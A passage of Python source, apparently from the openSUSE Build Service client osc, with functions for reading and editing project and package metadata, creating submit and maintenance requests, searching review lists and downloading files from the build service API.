url = makeurl(apiurl, ['source', prj, '_project', '_meta'], query)
try:
f = http_GET(url)
except HTTPError as e:
error_help = "%d" % e.code
os_err = e.hdrs.get('X-Opensuse-Errorcode')
if os_err:
error_help = "%s (%d) project: %s" % (os_err, e.code, prj)
if e.code == 404 and os_err == 'unknown_package':
error_help = 'option -r|--revision is not supported by this OBS version'
e.osc_msg = 'BuildService API error: %s' % error_help
raise
else:
if blame:
url = makeurl(apiurl, ['source', prj, '_project', '_meta'], query)
else:
url = makeurl(apiurl, ['source', prj, '_meta'])
f = http_GET(url)
return f.readlines()
def show_project_conf(apiurl, prj, rev=None, blame=None):
query = {}
url = None
if rev:
query['rev'] = rev
if blame:
query['view'] = "blame"
url = makeurl(apiurl, ['source', prj, '_project', '_config'], query=query)
else:
url = makeurl(apiurl, ['source', prj, '_config'], query=query)
f = http_GET(url)
return f.readlines()
def show_package_trigger_reason(apiurl, prj, pac, repo, arch):
url = makeurl(apiurl, ['build', prj, repo, arch, pac, '_reason'])
try:
f = http_GET(url)
return f.read()
except HTTPError as e:
e.osc_msg = 'Error getting trigger reason for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_package_meta(apiurl, prj, pac, meta=False, blame=None):
query = {}
if meta:
query['meta'] = 1
if blame:
query['view'] = "blame"
query['meta'] = 1
# The fake packages _project has no _meta file
if pac.startswith('_project'):
return ""
url = makeurl(apiurl, ['source', prj, pac, '_meta'], query)
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'Error getting meta for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_attribute_meta(apiurl, prj, pac, subpac, attribute, with_defaults, with_project):
path = []
path.append('source')
path.append(prj)
if pac:
path.append(pac)
if pac and subpac:
path.append(subpac)
path.append('_attribute')
if attribute:
path.append(attribute)
query = []
if with_defaults:
query.append("with_default=1")
if with_project:
query.append("with_project=1")
url = makeurl(apiurl, path, query)
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'Error getting meta for project \'%s\' package \'%s\'' % (prj, pac)
raise
def show_devel_project(apiurl, prj, pac):
m = show_package_meta(apiurl, prj, pac)
node = ET.fromstring(''.join(m)).find('devel')
if node is None:
return None, None
else:
return node.get('project'), node.get('package', None)
def set_devel_project(apiurl, prj, pac, devprj=None, devpac=None):
meta = show_package_meta(apiurl, prj, pac)
root = ET.fromstring(''.join(meta))
node = root.find('devel')
if node is None:
if devprj is None:
return
node = ET.Element('devel')
root.append(node)
else:
if devprj is None:
root.remove(node)
else:
node.clear()
if devprj:
node.set('project', devprj)
if devpac:
node.set('package', devpac)
url = makeurl(apiurl, ['source', prj, pac, '_meta'])
mf = metafile(url, ET.tostring(root, encoding=ET_ENCODING))
mf.sync()
def show_package_disabled_repos(apiurl, prj, pac):
m = show_package_meta(apiurl, prj, pac)
#FIXME: don't work if all repos of a project are disabled and only some are enabled since <disable/> is empty
try:
root = ET.fromstring(''.join(m))
elm = root.find('build')
r = [ node.get('repository') for node in elm.findall('disable')]
return r
except:
return None
def show_pattern_metalist(apiurl, prj):
url = makeurl(apiurl, ['source', prj, '_pattern'])
try:
f = http_GET(url)
tree = ET.parse(f)
except HTTPError as e:
e.osc_msg = 'show_pattern_metalist: Error getting pattern list for project \'%s\'' % prj
raise
r = sorted([ node.get('name') for node in tree.getroot() ])
return r
def show_pattern_meta(apiurl, prj, pattern):
url = makeurl(apiurl, ['source', prj, '_pattern', pattern])
try:
f = http_GET(url)
return f.readlines()
except HTTPError as e:
e.osc_msg = 'show_pattern_meta: Error getting pattern \'%s\' for project \'%s\'' % (pattern, prj)
raise
def show_configuration(apiurl):
u = makeurl(apiurl, ['public', 'configuration'])
f = http_GET(u)
return f.readlines()
class metafile:
"""metafile that can be manipulated and is stored back after manipulation."""
def __init__(self, url, input, change_is_required=False, file_ext='.xml'):
import tempfile
self.url = url
self.change_is_required = change_is_required
(fd, self.filename) = tempfile.mkstemp(prefix = 'osc_metafile.', suffix = file_ext)
f = os.fdopen(fd, 'w')
f.write(''.join(input))
f.close()
self.hash_orig = dgst(self.filename)
def sync(self):
if self.change_is_required and self.hash_orig == dgst(self.filename):
print('File unchanged. Not saving.')
os.unlink(self.filename)
return
print('Sending meta data...')
# don't do any exception handling... it's up to the caller what to do in case
# of an exception
http_PUT(self.url, file=self.filename)
os.unlink(self.filename)
print('Done.')
def edit(self):
try:
while True:
run_editor(self.filename)
try:
self.sync()
break
except HTTPError as e:
error_help = "%d" % e.code
if e.hdrs.get('X-Opensuse-Errorcode'):
error_help = "%s (%d)" % (e.hdrs.get('X-Opensuse-Errorcode'), e.code)
print('BuildService API error:', error_help, file=sys.stderr)
# examine the error - we can't raise an exception because we might want
# to try again
data = e.read()
if '<summary>' in data:
print(data.split('<summary>')[1].split('</summary>')[0], file=sys.stderr)
ri = raw_input('Try again? ([y/N]): ')
if ri not in ['y', 'Y']:
break
finally:
self.discard()
def discard(self):
if os.path.exists(self.filename):
print('discarding %s' % self.filename)
os.unlink(self.filename)
# different types of metadata
metatypes = { 'prj': { 'path': 'source/%s/_meta',
'template': new_project_templ,
'file_ext': '.xml'
},
'pkg': { 'path' : 'source/%s/%s/_meta',
'template': new_package_templ,
'file_ext': '.xml'
},
'attribute': { 'path' : 'source/%s/%s/_meta',
'template': new_attribute_templ,
'file_ext': '.xml'
},
'prjconf': { 'path': 'source/%s/_config',
'template': '',
'file_ext': '.txt'
},
'user': { 'path': 'person/%s',
'template': new_user_template,
'file_ext': '.xml'
},
'group': { 'path': 'group/%s',
'template': new_group_template,
'file_ext': '.xml'
},
'pattern': { 'path': 'source/%s/_pattern/%s',
'template': new_pattern_template,
'file_ext': '.xml'
},
}
def meta_exists(metatype,
path_args=None,
template_args=None,
create_new=True,
apiurl=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
url = make_meta_url(metatype, path_args, apiurl)
try:
data = http_GET(url).readlines()
except HTTPError as e:
if e.code == 404 and create_new:
data = metatypes[metatype]['template']
if template_args:
data = StringIO(data % template_args).readlines()
else:
raise e
return data
def make_meta_url(metatype, path_args=None, apiurl=None, force=False, remove_linking_repositories=False, msg=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
if metatype not in metatypes.keys():
raise AttributeError('make_meta_url(): Unknown meta type \'%s\'' % metatype)
path = metatypes[metatype]['path']
if path_args:
path = path % path_args
query = {}
if force:
query = { 'force': '1' }
if remove_linking_repositories:
query['remove_linking_repositories'] = '1'
if msg:
query['comment'] = msg
return makeurl(apiurl, [path], query)
def edit_meta(metatype,
path_args=None,
data=None,
template_args=None,
edit=False,
force=False,
remove_linking_repositories=False,
change_is_required=False,
apiurl=None,
msg=None):
global metatypes
if not apiurl:
apiurl = conf.config['apiurl']
if not data:
data = meta_exists(metatype,
path_args,
template_args,
create_new = metatype != 'prjconf', # prjconf always exists, 404 => unknown prj
apiurl=apiurl)
if edit:
change_is_required = True
if metatype == 'pkg':
# check if the package is a link to a different project
project, package = path_args
orgprj = ET.fromstring(''.join(data)).get('project')
if orgprj is not None and unquote(project) != orgprj:
print('The package is linked from a different project.')
print('If you want to edit the meta of the package create first a branch.')
print(' osc branch %s %s %s' % (orgprj, package, unquote(project)))
print(' osc meta pkg %s %s -e' % (unquote(project), package))
return
url = make_meta_url(metatype, path_args, apiurl, force, remove_linking_repositories, msg)
f = metafile(url, data, change_is_required, metatypes[metatype]['file_ext'])
if edit:
f.edit()
else:
f.sync()
def show_files_meta(apiurl, prj, pac, revision=None, expand=False, linkrev=None, linkrepair=False, meta=False, deleted=False):
query = {}
if revision:
query['rev'] = revision
else:
query['rev'] = 'latest'
if linkrev:
query['linkrev'] = linkrev
elif conf.config['linkcontrol']:
query['linkrev'] = 'base'
if meta:
query['meta'] = 1
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
if linkrepair:
query['emptylink'] = 1
f = http_GET(makeurl(apiurl, ['source', prj, pac], query=query))
return f.read()
def show_upstream_srcmd5(apiurl, prj, pac, expand=False, revision=None, meta=False, include_service_files=False, deleted=False):
m = show_files_meta(apiurl, prj, pac, expand=expand, revision=revision, meta=meta, deleted=deleted)
et = ET.fromstring(''.join(m))
if include_service_files:
try:
sinfo = et.find('serviceinfo')
if sinfo != None and sinfo.get('xsrcmd5') and not sinfo.get('error'):
return sinfo.get('xsrcmd5')
except:
pass
return et.get('srcmd5')
def show_upstream_xsrcmd5(apiurl, prj, pac, revision=None, linkrev=None, linkrepair=False, meta=False, include_service_files=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, linkrev=linkrev, linkrepair=linkrepair, meta=meta, expand=include_service_files)
et = ET.fromstring(''.join(m))
if include_service_files:
return et.get('srcmd5')
li_node = et.find('linkinfo')
if li_node is None:
return None
li = Linkinfo()
li.read(li_node)
if li.haserror():
raise oscerr.LinkExpandError(prj, pac, li.error)
return li.xsrcmd5
def show_project_sourceinfo(apiurl, project, nofilename, *packages):
query = ['view=info']
if packages:
query.extend(['package=%s' % quote_plus(p) for p in packages])
if nofilename:
query.append('nofilename=1')
f = http_GET(makeurl(apiurl, ['source', project], query=query))
return f.read()
def get_project_sourceinfo(apiurl, project, nofilename, *packages):
try:
si = show_project_sourceinfo(apiurl, project, nofilename, *packages)
except HTTPError as e:
# old API servers (e.g. 2.3.5) do not know the 'nofilename' parameter, so retry without
if e.code == 400 and nofilename:
return get_project_sourceinfo(apiurl, project, False, *packages)
# an uri too long error is sometimes handled as status 500
# (depending, e.g., on the apache2 configuration)
if e.code not in (414, 500):
raise
if len(packages) == 1:
raise oscerr.APIError('package name too long: %s' % packages[0])
n = len(packages) / 2
pkgs = packages[:n]
res = get_project_sourceinfo(apiurl, project, nofilename, *pkgs)
pkgs = packages[n:]
res.update(get_project_sourceinfo(apiurl, project, nofilename, *pkgs))
return res
root = ET.fromstring(si)
res = {}
for sinfo in root.findall('sourceinfo'):
res[sinfo.get('package')] = sinfo
return res
def show_upstream_rev_vrev(apiurl, prj, pac, revision=None, expand=False, meta=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, expand=expand, meta=meta)
et = ET.fromstring(''.join(m))
return et.get('rev'), et.get('vrev')
def show_upstream_rev(apiurl, prj, pac, revision=None, expand=False, linkrev=None, meta=False, include_service_files=False):
m = show_files_meta(apiurl, prj, pac, revision=revision, expand=expand, linkrev=linkrev, meta=meta)
et = ET.fromstring(''.join(m))
if include_service_files:
try:
sinfo = et.find('serviceinfo')
if sinfo != None and sinfo.get('xsrcmd5') and not sinfo.get('error'):
return sinfo.get('xsrcmd5')
except:
pass
return et.get('rev')
def read_meta_from_spec(specfile, *args):
import codecs, re
"""
Read tags and sections from spec file. To read out
a tag the passed argument mustn't end with a colon. To
read out a section the passed argument must start with
a '%'.
This method returns a dictionary which contains the
requested data.
"""
if not os.path.isfile(specfile):
raise oscerr.OscIOError(None, '\'%s\' is not a regular file' % specfile)
try:
lines = codecs.open(specfile, 'r', locale.getpreferredencoding()).readlines()
except UnicodeDecodeError:
lines = open(specfile).readlines()
tags = []
sections = []
spec_data = {}
for itm in args:
if itm.startswith('%'):
sections.append(itm)
else:
tags.append(itm)
tag_pat = '(?P<tag>^%s)\s*:\s*(?P<val>.*)'
for tag in tags:
m = re.compile(tag_pat % tag, re.I | re.M).search(''.join(lines))
if m and m.group('val'):
spec_data[tag] = m.group('val').strip()
section_pat = '^%s\s*?$'
for section in sections:
m = re.compile(section_pat % section, re.I | re.M).search(''.join(lines))
if m:
start = lines.index(m.group()+'\n') + 1
data = []
for line in lines[start:]:
if line.startswith('%'):
break
data.append(line)
spec_data[section] = data
return spec_data
def get_default_editor():
import platform
system = platform.system()
if system == 'Windows':
return 'notepad'
if system == 'Linux':
try:
# Python 2.6
dist = platform.linux_distribution()[0]
except AttributeError:
dist = platform.dist()[0]
if dist == 'debian':
return 'editor'
elif dist == 'fedora':
return 'vi'
return 'vim'
return 'vi'
def get_default_pager():
import platform
system = platform.system()
if system == 'Windows':
return 'less'
if system == 'Linux':
try:
# Python 2.6
dist = platform.linux_distribution()[0]
except AttributeError:
dist = platform.dist()[0]
if dist == 'debian':
return 'pager'
return 'less'
return 'more'
def run_pager(message, tmp_suffix=''):
import tempfile, sys
if not message:
return
if not sys.stdout.isatty():
print(message)
else:
tmpfile = tempfile.NamedTemporaryFile(suffix=tmp_suffix)
tmpfile.write(message)
tmpfile.flush()
pager = os.getenv('PAGER', default=get_default_pager())
cmd = shlex.split(pager) + [tmpfile.name]
try:
run_external(*cmd)
finally:
tmpfile.close()
def run_editor(filename):
cmd = _editor_command()
cmd.append(filename)
return run_external(cmd[0], *cmd[1:])
def _editor_command():
editor = os.getenv('EDITOR', default=get_default_editor())
try:
cmd = shlex.split(editor)
except SyntaxError:
cmd = editor.split()
return cmd
def _edit_message_open_editor(filename, data, orig_mtime):
# FIXME: import modules globally
import tempfile
editor = _editor_command()
mtime = os.stat(filename).st_mtime
if mtime == orig_mtime:
# prepare file for editors
if editor[0] in ('vi', 'vim'):
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
editor.extend(['-c', ':r %s' % f.name, filename])
run_external(editor[0], *editor[1:])
else:
with open(filename, 'w') as f:
f.write(data)
orig_mtime = os.stat(filename).st_mtime
run_editor(filename)
else:
run_editor(filename)
return os.stat(filename).st_mtime != orig_mtime
def edit_message(footer='', template='', templatelen=30):
delim = '--This line, and those below, will be ignored--\n'
data = ''
if template != '':
if not templatelen is None:
lines = template.splitlines()
data = '\n'.join(lines[:templatelen])
if lines[templatelen:]:
footer = '%s\n\n%s' % ('\n'.join(lines[templatelen:]), footer)
data += '\n' + delim + '\n' + footer
return edit_text(data, delim, suffix='.diff', template=template)
def edit_text(data='', delim=None, suffix='.txt', template=''):
import tempfile
try:
(fd, filename) = tempfile.mkstemp(prefix='osc-editor', suffix=suffix)
os.close(fd)
mtime = os.stat(filename).st_mtime
ri_err = False
while True:
if not ri_err:
file_changed = _edit_message_open_editor(filename, data, mtime)
msg = open(filename).read()
if delim:
msg = msg.split(delim)[0].rstrip()
if msg and file_changed:
break
else:
reason = 'Log message not specified'
if template == msg:
reason = 'Default log message was not changed. Press \'c\' to continue.'
ri = raw_input('%s\na)bort, c)ontinue, e)dit: ' % reason)
if ri in 'aA':
raise oscerr.UserAbort()
elif ri in 'cC':
break
elif ri in 'eE':
ri_err = False
else:
print("%s is not a valid option." % ri)
ri_err = True
finally:
os.unlink(filename)
return msg
def clone_request(apiurl, reqid, msg=None):
query = {'cmd': 'branch', 'request': reqid}
url = makeurl(apiurl, ['source'], query)
r = http_POST(url, data=msg)
root = ET.fromstring(r.read())
project = None
for i in root.findall('data'):
if i.get('name') == 'targetproject':
project = i.text.strip()
if not project:
raise oscerr.APIError('invalid data from clone request:\n%s\n' % ET.tostring(root, encoding=ET_ENCODING))
return project
# create a maintenance release request
def create_release_request(apiurl, src_project, message=''):
import cgi
r = Request()
# api will complete the request
r.add_action('maintenance_release', src_project=src_project)
# XXX: clarify why we need the unicode(...) stuff
r.description = cgi.escape(unicode(message, 'utf8'))
r.create(apiurl)
return r
# create a maintenance incident per request
def create_maintenance_request(apiurl, src_project, src_packages, tgt_project, tgt_releaseproject, opt_sourceupdate, message=''):
import cgi
r = Request()
if src_packages:
for p in src_packages:
r.add_action('maintenance_incident', src_project=src_project, src_package=p, tgt_project=tgt_project, tgt_releaseproject=tgt_releaseproject, opt_sourceupdate = opt_sourceupdate)
else:
r.add_action('maintenance_incident', src_project=src_project, tgt_project=tgt_project, tgt_releaseproject=tgt_releaseproject, opt_sourceupdate = opt_sourceupdate)
# XXX: clarify why we need the unicode(...) stuff
r.description = cgi.escape(unicode(message, 'utf8'))
r.create(apiurl, addrevision=True)
return r
def create_submit_request(apiurl,
src_project, src_package=None,
dst_project=None, dst_package=None,
message="", orev=None, src_update=None, dst_updatelink=None):
import cgi
options_block = ""
package = ""
if src_package:
package = """package="%s" """ % (src_package)
options_block = "<options>"
if src_update:
options_block += """<sourceupdate>%s</sourceupdate>""" % (src_update)
if dst_updatelink:
options_block += """<updatelink>true</updatelink>"""
options_block += "</options>"
# Yes, this kind of xml construction is horrible
targetxml = ""
if dst_project:
packagexml = ""
if dst_package:
packagexml = """package="%s" """ % ( dst_package )
targetxml = """<target project="%s" %s /> """ % ( dst_project, packagexml )
# XXX: keep the old template for now in order to work with old obs instances
xml = """\
<request>
<action type="submit">
<source project="%s" %s rev="%s"/>
%s
%s
</action>
<state name="new"/>
<description>%s</description>
</request>
""" % (src_project,
package,
orev or show_upstream_rev(apiurl, src_project, src_package),
targetxml,
options_block,
cgi.escape(message))
# Don't do cgi.escape(unicode(message, "utf8"))) above.
# Promoting the string to utf8, causes the post to explode with:
# uncaught exception: Fatal error: Start tag expected, '<' not found at :1.
# I guess, my original workaround was not that bad.
u = makeurl(apiurl, ['request'], query='cmd=create')
r = None
try:
f = http_POST(u, data=xml)
root = ET.parse(f).getroot()
r = root.get('id')
except HTTPError as e:
if e.hdrs.get('X-Opensuse-Errorcode') == "submit_request_rejected":
print("WARNING:")
print("WARNING: Project does not accept submit request, request to open a NEW maintenance incident instead")
print("WARNING:")
xpath = 'maintenance/maintains/@project = \'%s\' and attribute/@name = \'%s\'' % (dst_project, conf.config['maintenance_attribute'])
res = search(apiurl, project_id=xpath)
root = res['project_id']
project = root.find('project')
if project is None:
print("WARNING: This project is not maintained in the maintenance project specified by '%s', looking elsewhere" % conf.config['maintenance_attribute'])
xpath = 'maintenance/maintains/@project = \'%s\'' % dst_project
res = search(apiurl, project_id=xpath)
root = res['project_id']
project = root.find('project')
if project is None:
raise oscerr.APIError("Server did not define a default maintenance project, can't submit.")
tproject = project.get('name')
r = create_maintenance_request(apiurl, src_project, [src_package], tproject, dst_project, src_update, message)
r = r.reqid
else:
raise
return r
def get_request(apiurl, reqid):
u = makeurl(apiurl, ['request', reqid], {'withfullhistory': '1'})
f = http_GET(u)
root = ET.parse(f).getroot()
r = Request()
r.read(root)
return r
def change_review_state(apiurl, reqid, newstate, by_user='', by_group='', by_project='', by_package='', message='', supersed=None):
query = {'cmd': 'changereviewstate', 'newstate': newstate }
if by_user:
query['by_user'] = by_user
if by_group:
query['by_group'] = by_group
if by_project:
query['by_project'] = by_project
if by_package:
query['by_package'] = by_package
if supersed:
query['superseded_by'] = supersed
u = makeurl(apiurl, ['request', reqid], query=query)
f = http_POST(u, data=message)
root = ET.parse(f).getroot()
return root.get('code')
def change_request_state(apiurl, reqid, newstate, message='', supersed=None, force=False):
query = {'cmd': 'changestate', 'newstate': newstate }
if supersed:
query['superseded_by'] = supersed
if force:
query['force'] = "1"
u = makeurl(apiurl,
['request', reqid], query=query)
f = http_POST(u, data=message)
root = ET.parse(f).getroot()
return root.get('code', 'unknown')
def change_request_state_template(req, newstate):
if not len(req.actions):
return ''
action = req.actions[0]
tmpl_name = '%srequest_%s_template' % (action.type, newstate)
tmpl = conf.config.get(tmpl_name, '')
tmpl = tmpl.replace('\\t', '\t').replace('\\n', '\n')
data = {'reqid': req.reqid, 'type': action.type, 'who': req.creator}
if req.actions[0].type == 'submit':
data.update({'src_project': action.src_project,
'src_package': action.src_package, 'src_rev': action.src_rev,
'dst_project': action.tgt_project, 'dst_package': action.tgt_package,
'tgt_project': action.tgt_project, 'tgt_package': action.tgt_package})
try:
return tmpl % data
except KeyError as e:
print('error: cannot interpolate \'%s\' in \'%s\'' % (e.args[0], tmpl_name), file=sys.stderr)
return ''
def get_review_list(apiurl, project='', package='', byuser='', bygroup='', byproject='', bypackage='', states=(),
req_type=''):
# this is so ugly...
def build_by(xpath, val):
if 'all' in states:
return xpath_join(xpath, 'review/%s' % val, op='and')
elif states:
s_xp = ''
for state in states:
s_xp = xpath_join(s_xp, '@state=\'%s\'' % state, inner=True)
val = val.strip('[').strip(']')
return xpath_join(xpath, 'review[%s and (%s)]' % (val, s_xp), op='and')
else:
# default case
return xpath_join(xpath, 'review[%s and @state=\'new\']' % val, op='and')
return ''
xpath = ''
if states == ():
# default: requests which are still open and have reviews in "new" state
xpath = xpath_join('', 'state/@name=\'review\'', op='and')
xpath = xpath_join(xpath, 'review/@state=\'new\'', op='and')
if byuser:
xpath = build_by(xpath, '@by_user=\'%s\'' % byuser)
if bygroup:
xpath = build_by(xpath, '@by_group=\'%s\'' % bygroup)
if bypackage:
xpath = build_by(xpath, '@by_project=\'%s\' and @by_package=\'%s\'' % (byproject, bypackage))
elif byproject:
xpath = build_by(xpath, '@by_project=\'%s\'' % byproject)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
# XXX: we cannot use the '|' in the xpath expression because it is not supported
# in the backend
todo = {}
if project:
todo['project'] = project
if package:
todo['package'] = package
for kind, val in todo.items():
xpath_base = 'action/target/@%(kind)s=\'%(val)s\' or ' \
'submit/target/@%(kind)s=\'%(val)s\''
if conf.config['include_request_from_project']:
xpath_base = xpath_join(xpath_base, 'action/source/@%(kind)s=\'%(val)s\' or ' \
'submit/source/@%(kind)s=\'%(val)s\'', op='or', inner=True)
xpath = xpath_join(xpath, xpath_base % {'kind': kind, 'val': val}, op='and', nexpr_parentheses=True)
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
res = search(apiurl, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
# this function uses the logic in the api which is faster and more exact then the xpath search
def get_request_collection(apiurl, role=None, req_who=None, req_states=('new', 'review', 'declined')):
query={ "view" : "collection" }
if role:
query["roles"] = role
if req_who:
query["user"] = req_who
query["states"] = ",".join(req_states)
u = makeurl(apiurl, ['request'], query)
f = http_GET(u)
res = ET.parse(f).getroot()
requests = []
for root in res.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
def get_exact_request_list(apiurl, src_project, dst_project, src_package=None, dst_package=None, req_who=None, req_state=('new', 'review', 'declined'), req_type=None):
xpath = ''
if not 'all' in req_state:
for state in req_state:
xpath = xpath_join(xpath, 'state/@name=\'%s\'' % state, op='or', inner=True)
xpath = '(%s)' % xpath
if req_who:
xpath = xpath_join(xpath, '(state/@who=\'%(who)s\' or history/@who=\'%(who)s\')' % {'who': req_who}, op='and')
xpath += " and action[source/@project='%s'" % src_project
if src_package:
xpath += " and source/@package='%s'" % src_package
xpath += " and target/@project='%s'" % dst_project
if dst_package:
xpath += " and target/@package='%s'" % dst_package
xpath += "]"
if req_type:
xpath += " and action/@type=\'%s\'" % req_type
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
res = search(apiurl, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
def get_request_list(apiurl, project='', package='', req_who='', req_state=('new', 'review', 'declined'), req_type=None, exclude_target_projects=[],
withfullhistory=False):
xpath = ''
if not 'all' in req_state:
for state in req_state:
xpath = xpath_join(xpath, 'state/@name=\'%s\'' % state, inner=True)
if req_who:
xpath = xpath_join(xpath, '(state/@who=\'%(who)s\' or history/@who=\'%(who)s\')' % {'who': req_who}, op='and')
# XXX: we cannot use the '|' in the xpath expression because it is not supported
# in the backend
todo = {}
if project:
todo['project'] = project
if package:
todo['package'] = package
for kind, val in todo.items():
xpath_base = 'action/target/@%(kind)s=\'%(val)s\' or ' \
'submit/target/@%(kind)s=\'%(val)s\''
if conf.config['include_request_from_project']:
xpath_base = xpath_join(xpath_base, 'action/source/@%(kind)s=\'%(val)s\' or ' \
'submit/source/@%(kind)s=\'%(val)s\'', op='or', inner=True)
xpath = xpath_join(xpath, xpath_base % {'kind': kind, 'val': val}, op='and', nexpr_parentheses=True)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
for i in exclude_target_projects:
xpath = xpath_join(xpath, '(not(action/target/@project=\'%(prj)s\' or ' \
'submit/target/@project=\'%(prj)s\'))' % {'prj': i}, op='and')
if conf.config['verbose'] > 1:
print('[ %s ]' % xpath)
queries = {}
if withfullhistory:
queries['request'] = {'withfullhistory': '1'}
res = search(apiurl, queries=queries, request=xpath)
collection = res['request']
requests = []
for root in collection.findall('request'):
r = Request()
r.read(root)
requests.append(r)
return requests
# old style search, this is to be removed
def get_user_projpkgs_request_list(apiurl, user, req_state=('new', 'review', ), req_type=None, exclude_projects=[], projpkgs={}):
"""OBSOLETE: user involved request search is supported by OBS 2.2 server side in a better way
Return all running requests for all projects/packages where is user is involved"""
if not projpkgs:
res = get_user_projpkgs(apiurl, user, exclude_projects=exclude_projects)
projects = []
for i in res['project_id'].findall('project'):
projpkgs[i.get('name')] = []
projects.append(i.get('name'))
for i in res['package_id'].findall('package'):
if not i.get('project') in projects:
projpkgs.setdefault(i.get('project'), []).append(i.get('name'))
if not projpkgs:
return []
xpath = ''
for prj, pacs in projpkgs.items():
if not len(pacs):
xpath = xpath_join(xpath, 'action/target/@project=\'%s\'' % prj, inner=True)
else:
xp = ''
for p in pacs:
xp = xpath_join(xp, 'action/target/@package=\'%s\'' % p, inner=True)
xp = xpath_join(xp, 'action/target/@project=\'%s\'' % prj, op='and')
xpath = xpath_join(xpath, xp, inner=True)
if req_type:
xpath = xpath_join(xpath, 'action/@type=\'%s\'' % req_type, op='and')
if not 'all' in req_state:
xp = ''
for state in req_state:
xp = xpath_join(xp, 'state/@name=\'%s\'' % state, inner=True)
xpath = xpath_join(xp, xpath, op='and', nexpr_parentheses=True)
res = search(apiurl, request=xpath)
result = []
for root in res['request'].findall('request'):
r = Request()
r.read(root)
result.append(r)
return result
def get_request_log(apiurl, reqid):
r = get_request(apiurl, reqid)
data = []
frmt = '-' * 76 + '\n%s | %s | %s\n\n%s'
r.statehistory.reverse()
# the description of the request is used for the initial log entry
# otherwise its comment attribute would contain None
if len(r.statehistory) >= 1:
r.statehistory[-1].comment = r.description
else:
r.state.comment = r.description
for state in [ r.state ] + r.statehistory:
s = frmt % (state.name, state.who, state.when, str(state.comment))
data.append(s)
return data
def check_existing_requests(apiurl, src_project, src_package, dst_project,
dst_package):
reqs = get_exact_request_list(apiurl, src_project, dst_project,
src_package, dst_package,
req_type='submit',
req_state=['new', 'review', 'declined'])
repl = ''
if reqs:
print('There are already the following submit request: %s.' % \
', '.join([i.reqid for i in reqs]))
repl = raw_input('Supersede the old requests? (y/n/c) ')
while repl.lower() not in ['c', 'y', 'n']:
print('%s is not a valid option.' % repl)
repl = raw_input('Supersede the old requests? (y/n/c) ')
if repl.lower() == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
return repl == 'y', reqs
def check_existing_maintenance_requests(apiurl, src_project, src_packages, dst_project,
release_project):
reqs = []
for src_package in src_packages:
reqs += get_exact_request_list(apiurl, src_project, dst_project,
src_package, None,
req_type='maintenance_incident',
req_state=['new', 'review', 'declined'])
repl = ''
if reqs:
print('There are already the following maintenance incident request: %s.' % \
', '.join([i.reqid for i in reqs]))
repl = raw_input('Supersede the old requests? (y/n/c) ')
while repl.lower() not in ['c', 'y', 'n']:
print('%s is not a valid option.' % repl)
repl = raw_input('Supersede the old requests? (y/n/c) ')
if repl.lower() == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
return repl == 'y', reqs
# old function for compat reasons. Some plugins may call this function.
# and we do not want to break the plugins.
def get_group(apiurl, group):
return get_group_meta(apiurl, group)
def get_group_meta(apiurl, group):
u = makeurl(apiurl, ['group', quote_plus(group)])
try:
f = http_GET(u)
return ''.join(f.readlines())
except HTTPError:
print('group \'%s\' not found' % group)
return None
def get_user_meta(apiurl, user):
u = makeurl(apiurl, ['person', quote_plus(user)])
try:
f = http_GET(u)
return ''.join(f.readlines())
except HTTPError:
print('user \'%s\' not found' % user)
return None
def _get_xml_data(meta, *tags):
data = []
if meta != None:
root = ET.fromstring(meta)
for tag in tags:
elm = root.find(tag)
if elm is None or elm.text is None:
data.append('-')
else:
data.append(elm.text)
return data
def get_user_data(apiurl, user, *tags):
"""get specified tags from the user meta"""
meta = get_user_meta(apiurl, user)
return _get_xml_data(meta, *tags)
def get_group_data(apiurl, group, *tags):
meta = get_group_meta(apiurl, group)
return _get_xml_data(meta, *tags)
def download(url, filename, progress_obj = None, mtime = None):
import tempfile, shutil
global BUFSIZE
o = None
try:
prefix = os.path.basename(filename)
path = os.path.dirname(filename)
(fd, tmpfile) = tempfile.mkstemp(dir=path, prefix = prefix, suffix = '.osctmp')
os.fchmod(fd, 0o644)
try:
o = os.fdopen(fd, 'wb')
for buf in streamfile(url, http_GET, BUFSIZE, progress_obj=progress_obj):
o.write(bytes(buf, "utf-8"))
o.close()
os.rename(tmpfile, filename)
except:
os.unlink(tmpfile)
raise
finally:
if o is not None:
o.close()
if mtime:
utime(filename, (-1, mtime))
def get_source_file(apiurl, prj, package, filename, targetfilename=None, revision=None, progress_obj=None, mtime=None, meta=False):
targetfilename = targetfilename or filename
query = {}
if meta:
query['rev'] = 1
if revision:
query['rev'] = revision
u = makeurl(apiurl, ['source', prj, package, pathname2url(filename.encode(locale.getpreferredencoding(), 'replace'))], query=query)
download(u, targetfilename, progress_obj, mtime)
def get_binary_file(apiurl, prj, repo, arch,
filename,
package = None,
target_filename = None,
target_mtime = None,
progress_meter = False):
progress_obj = None
if progress_meter:
from .meter import TextMeter
progress_obj = TextMeter()
target_filename = target_filename or filename
where = package or '_repository'
u = makeurl(apiurl, ['build', prj, repo, arch, where, filename])
download(u, target_filename, progress_obj, target_mtime)
if target_filename.endswith('.AppImage'):
os.chmod(target_filename, 0o755)
def dgst_from_string(str):
# Python 2.5 depracates the md5 modules
# Python 2.4 doesn't have hashlib yet
try:
import hashlib
md5_hash = hashlib.md5()
except ImportError:
import md5
md5_hash = md5.new()
md5_hash.update(str)
return md5_hash.hexdigest()
def dgst(file):
#if not os.path.exists(file):
#return None
global BUFSIZE
try:
